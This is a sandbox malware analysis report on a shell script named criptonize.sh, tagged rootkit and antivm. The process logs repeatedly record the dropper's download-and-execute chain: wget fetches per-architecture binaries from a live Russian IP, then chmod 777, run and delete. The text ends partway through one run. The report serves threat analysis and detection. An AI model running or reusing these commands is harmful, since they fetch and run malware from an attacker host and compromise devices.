Malware Analysis Report

2025-01-23 14:22

Sample ID: 240827-3svyxsxdlf
Target: criptonize.sh
SHA256: 5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
Tags: rootkit antivm
Score: 8/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral6 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral7 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral8 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral5 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral9 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 8/10

SHA256: 5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405

Threat Level: Likely malicious

The file criptonize.sh was found to be: Likely malicious.

Malicious Activity Summary

rootkit antivm

Writes memory of remote process

Loads a kernel module

Checks CPU configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-27 23:47

Signatures

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

29s

Max time network

30s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/bin/rm

[rm -f criptonize.armv6l]

/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/bin/rm

[rm -f criptonize.armv5l]

/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/bin/rm

[rm -f criptonize.armv4eb]

/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/bin/rm

[rm -f criptonize.armv4tl]

/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/bin/rm

[rm -f criptonize.armv4l]

/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/bin/rm

[rm -f criptonize.mips64]

/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/bin/rm

[rm -f criptonize.mips]

/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/bin/rm

[rm -f criptonize.mipsel]

/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/wget

[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
N/A 224.0.0.251:5353 N/A udp
GB 185.125.188.62:443 N/A tcp
GB 185.125.188.62:443 N/A tcp
US 151.101.1.91:443 N/A tcp
US 151.101.1.91:443 N/A tcp
RU 212.60.5.174:80 212.60.5.174 tcp
GB 195.181.164.14:443 N/A tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu2004-amd64-20240508-en

Max time kernel

27s

Max time network

32s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.m68k /usr/bin/wget N/A
File opened for modification /tmp/criptonize.arc700 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sparc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sh4 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.bsdamd64 /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/usr/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/wget

[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

/usr/bin/chmod

[chmod 777 criptonize.powerpc]

/tmp/criptonize.powerpc

[./criptonize.powerpc powerpc]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/wget

[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]

/usr/bin/chmod

[chmod 777 criptonize.m68k]

/tmp/criptonize.m68k

[./criptonize.m68k m68k]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/wget

[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]

/usr/bin/chmod

[chmod 777 criptonize.sh4]

/tmp/criptonize.sh4

[./criptonize.sh4 sh4]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/wget

[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]

/usr/bin/chmod

[chmod 777 criptonize.sparc]

/tmp/criptonize.sparc

[./criptonize.sparc sparc]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/wget

[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]

/usr/bin/chmod

[chmod 777 criptonize.arc700]

/tmp/criptonize.arc700

[./criptonize.arc700 arc700]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/rm

[rm -f criptonize.bsdamd64]

/usr/bin/wget

[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]

/usr/bin/chmod

[chmod 777 criptonize.bsdamd64]

/tmp/criptonize.bsdamd64

[./criptonize.bsdamd64 bsdamd64]

/usr/bin/rm

[rm -f criptonize.bsdamd64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
RU 212.60.5.174:80 212.60.5.174 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

29s

Max time network

29s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

debian9-mipsel-20240729-en

Max time kernel

30s

Max time network

31s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/bin/rm

[rm -f criptonize.armv6l]

/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/bin/rm

[rm -f criptonize.armv5l]

/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/bin/rm

[rm -f criptonize.armv4eb]

/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/bin/rm

[rm -f criptonize.armv4tl]

/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/bin/rm

[rm -f criptonize.armv4l]

/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/bin/rm

[rm -f criptonize.mips64]

/bin/rm

[rm -f criptonize.mips]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:48

Platform

debian9-armhf-20240611-en

Max time kernel

28s

Max time network

48s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

